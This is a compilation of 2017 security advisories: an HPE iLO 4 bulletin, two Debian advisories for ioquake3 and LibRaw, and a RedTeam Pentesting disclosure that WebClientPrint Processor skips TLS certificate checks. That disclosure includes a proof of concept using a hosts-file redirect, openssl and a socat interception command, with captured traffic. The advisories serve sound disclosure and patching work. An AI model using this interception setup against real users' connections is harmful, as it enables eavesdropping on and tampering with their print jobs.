Note: the current version of the following document is available here:https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_usSUPPORT COMMUNICATION - SECURITY BULLETINDocument ID: hpesbhf03769en_usVersion: 1HPESBHF03769 rev.1 - HPE Integrated Lights-out 4 (iLO 4) Multiple RemoteVulnerabilitiesNOTICE: The information in this Security Bulletin should be acted upon assoon as possible.Release Date: 2017-08-23Last Updated: 2017-08-23Potential Security Impact: Remote: Authentication Bypass, Code ExecutionSource: Hewlett Packard Enterprise, Product Security Response TeamVULNERABILITY SUMMARYA potential security vulnerability has been identified in HPE IntegratedLights-out (iLO 4). The vulnerability could be exploited remotely to allowauthentication bypass and execution of code.References: - CVE-2017-12542SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - HP Integrated Lights-Out 4 (iLO 4), Prior to 2.53BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2017-12542 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here:https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499Hewlett Packard Enterprise would like to thank Fabien Perigaud of AirbusDefense and Space CyberSecurity for reporting this vulnerability.RESOLUTIONHPE has provided software updates to resolve the vulnerability in HPEIntegrated Lights-out 4 (iLO 4). Please upgrade to HPE Integrated Lights-out4 (iLO 4) firmware version 2.53 or newer.* The firmware is available at <http://www.hpe.com/support/ilo4>HISTORYVersion:1 (rev.1) - 24 August 2017 Initial releaseThird Party Security Patches: Third party security patches that are to beinstalled on systems running Hewlett Packard Enterprise (HPE) softwareproducts should be applied in accordance with the customer's patch managementpolicy.Support: For issues about implementing the recommendations of this SecurityBulletin, contact normal HPE Services support channel. For other issues aboutthe content of this Security Bulletin, send e-mail to security-alert@hpe.com.Report: To report a potential security vulnerability for any HPE supportedproduct: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.comSubscribe: To initiate a subscription to receive future HPE Security Bulletinalerts via Email: http://www.hpe.com/support/Subscriber_ChoiceSecurity Bulletin Archive: A list of recently released Security Bulletins isavailable here: http://www.hpe.com/support/Security_Bulletin_ArchiveSoftware Product Category: The Software Product Category is represented inthe title by the two characters following HPSB.3C = 3COM3P = 3rd Party SoftwareGN = HPE General SoftwareHF = HPE Hardware and FirmwareMU = Multi-Platform SoftwareNS = NonStop ServersOV = OpenVMSPV = ProCurveST = Storage SoftwareUX = HP-UXCopyright 2016 Hewlett Packard EnterpriseHewlett Packard Enterprise shall not be liable for technical or editorialerrors or omissions contained herein. The information provided is provided"as is" without warranty of any kind. To the extent permitted by law, neitherHP or its affiliates, subcontractors or suppliers will be liable forincidental,special or consequential damages including downtime cost; lostprofits; damages relating to the procurement of substitute products orservices; or damages for loss of data, or software restoration. Theinformation in this document is subject to change without notice. HewlettPackard Enterprise and the names of Hewlett Packard Enterprise productsreferenced herein are trademarks of Hewlett Packard Enterprise in the UnitedStates and other countries. Other product and company names mentioned hereinmay be trademarks of their respective owners.
- -------------------------------------------------------------------------Debian Security Advisory DSA-3948-1 security@debian.orghttps://www.debian.org/security/ Moritz MuehlenhoffAugust 19, 2017 https://www.debian.org/security/faq- -------------------------------------------------------------------------Package : ioquake3CVE ID : CVE-2017-11721A read buffer overflow was discovered in the idtech3 (Quake III Arena)family of game engines. This allows remote attackers to cause a denialof service (application crash) or possibly have unspecified other impactvia a crafted packet.For the oldstable distribution (jessie), this problem has been fixedin version 1.36+u20140802+gca9eebb-2+deb8u2.For the stable distribution (stretch), this problem has been fixed inversion 1.36+u20161101+dfsg1-2+deb9u1.We recommend that you upgrade your ioquake3 packages.Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/
- -------------------------------------------------------------------------Debian Security Advisory DSA-3950-1 security@debian.orghttps://www.debian.org/security/ Luciano BelloAugust 21, 2017 https://www.debian.org/security/faq- -------------------------------------------------------------------------Package : librawCVE ID : CVE-2017-6886 CVE-2017-6887Debian Bug : 864183Hossein Lotfi and Jakub Jirasek from Secunia Research have discoveredmultiple vulnerabilities in LibRaw, a library for reading RAW images. Anattacker could cause a memory corruption leading to a DoS (Denial ofService) with craft KDC or TIFF file.For the oldstable distribution (jessie), these problems have been fixedin version 0.16.0-9+deb8u3.For the stable distribution (stretch), these problems have been fixed inversion 0.17.2-6+deb9u1.We recommend that you upgrade your libraw packages.Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/
Advisory: WebClientPrint Processor 2.0: No Validation of TLS CertificatesRedTeam Pentesting discovered that WebClientPrint Processor (WCPP) doesnot validate TLS certificates when initiating HTTPS connections. Thus, aman-in-the-middle attacker may intercept and/or modify HTTPS traffic intransit. This may result in a disclosure of sensitive information andthe integrity of printed documents cannot be guaranteed.Details=======Product: Neodynamic WebClientPrint ProcessorAffected Versions: 2.0.15.109 (Microsoft Windows)Fixed Versions: >= 2.0.15.910Vulnerability Type: Improper Certificate ValidationSecurity Risk: mediumVendor URL: http://www.neodynamic.com/Vendor Status: fixed version releasedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-011Advisory Status: publishedCVE: GENERIC-MAP-NOMATCHCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCHIntroduction============Neodynamic's WebClientPrint Processor is a client-side application,which allows server-side applications to print documents on a client'sprinter without user interaction, bypassing the browser's printfunctionality. The server-side application may be written in ASP.NET orPHP while on the client-side multiple platforms and browsers aresupported."Send raw data, text and native commands to client printers withoutshowing or displaying any print dialog box!" (Neodynamic's website)More Details============Upon installation under Microsoft Windows, WCPP registers itself as ahandler for the "webclientprint" URL scheme. Thus, any URL starting with"webclientprint:" is handled by WCPP. For example, enteringwebclientprint:-aboutin the URL bar of a browser opens the about box of WCPP.Neodynamic prodvides an online demo for test printing at the followingURL:http://webclientprint.azurewebsites.net/If visited via HTTPS, the WCPP component on the client-side will try tofetch the print job via HTTPS as well.Proof of Concept================To simulate a man-in-the-middle scenario, an entry similar to thefollowing was appended to the "hosts" file:------------------------------------------------------------------------10.0.2.2 webclientprint.azurewebsites.net------------------------------------------------------------------------On the host 10.0.2.2, a self-signed certificate can be generated andafterwards socat[1] can be used to intercept and display the encryptedHTTP traffic as follows:------------------------------------------------------------------------$ openssl genrsa -out server.key 4096$ openssl dhparam -out dhparam.pem 1024$ openssl req -new -x509 -key server.key -out server.pem -days 365 \-subj /CN=webclientprint.azurewebsites.net$ cat server.key >> server.pem$ cat dhparam.pem >> server.pem$ sudo socat -v openssl-listen:443,reuseaddr,verify=0,fork,\cert=server.pem openssl-connect:webclientprint.azurewebsites.net:443,\verify=0------------------------------------------------------------------------The demo website is available via HTTPS using the following URL:https://webclientprint.azurewebsites.net/Any modern browser displays a warning due to the invalid TLS certificatepresented by socat.On the contrary, WCPP simply accepts any certificate it is presentedwith, when, for examplem printing a demo TXT file. Such a request isgiven in the listing below. The output has been shortened and wrappedmanually for better readability.------------------------------------------------------------------------GET /DemoPrintFile.ashx?clientPrint&useDefaultPrinter=undefined& printerName=null&filetype=TXT HTTP/1.0\rHost: webclientprint.azurewebsites.net\rUser-Agent: WCPP/2.0.15.109(Windows; 6.1)\rAccept-Encoding: gzip, deflate\r\r< 2015/09/07 10:29:27.478913 length=3538 from=0 to=3537HTTP/1.1 200 OK\rCache-Control: private\rContent-Length: 3180\rContent-Type: application/octet-stream\rServer: Microsoft-IIS/8.0\rX-AspNet-Version: 4.0.30319\rX-Powered-By: ASP.NET\rSet-Cookie: ARRAffinity=23c01e1a9de38f884445e396de9940aef5941b9af3f6d9 cfa57066fe4d5fcb16;Path=/;Domain=webclientprint.azurewebsites.net\rDate: Mon, 07 Sep 2015 08:29:27 GMT\rConnection: close\r\rcpj..\v...\v..wcpPF:9c8d5316ffeb403d8be09565c2391f92.TXT|Printed ByWebClientPrint\r=========================\r\rLorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce urnamassa, eleifend non posuere quis, iaculis et libero. Curabitur laciniadolor non nisl pharetra tempus.[...]Etiam nisl nisi, eleifend vel molestie tincidunt, porttitor ac nunc.Vestibulum vulputate magna gravida neque imperdiet ac viverra nullasuscipit..Acopian Technical Company - 1 WebApp Lic - 2 WebServerLic|xxxxxxxxxxxxxxxxxxxxx------------------------------------------------------------------------This shows that WCPP does not verify TLS certificates when establishingHTTPS connections.Workaround==========Affected users should disable the WCPP handler and upgrade to a fixedversion as soon as possible.Fix===Install a WCPP version greater or equal to 2.0.15.910[0].Security Risk=============WCPP does not verify TLS certificates when establishing HTTPSconnections. Man-in-the-middle attackers can therefore intercept thoseconnections with little effort. This may lead to a disclosure ofconfidential information if sensitive documents are printed via WCPP.Furthermore, the integrity of the printed documents cannot be guaranteedas attackers are able to modify the documents in transit.The described attack requires a man-in-the-middle position which is arather strong prerequisite. It is therefore estimated that thevulnerability poses a medium risk.Timeline========2015-08-24 Vulnerability identified2015-09-03 Customer approved disclosure to vendor2015-09-04 Asked vendor for security contact2015-09-04 CVE number requested2015-09-04 Vendor responded with security contact2015-09-07 Vendor notified2015-09-07 Vendor acknowledged receipt of advisory2015-09-15 Vendor released fixed version2015-09-16 Customer asked to wait with advisory release until all their clients are updated2017-07-31 Customer approved advisory release2017-08-22 Advisory releasedReferences==========[0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/[1] http://www.dest-unreach.org/socat/RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests performed by ateam of specialised IT-security experts. Hereby, security weaknesses incompany networks or products are uncovered and can be fixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found at:https://www.redteam-pentesting.de/Working at RedTeam Pentesting=============================RedTeam Pentesting is looking for penetration testers to join our teamin Aachen, Germany. If you are interested please visit:https://www.redteam-pentesting.de/jobs/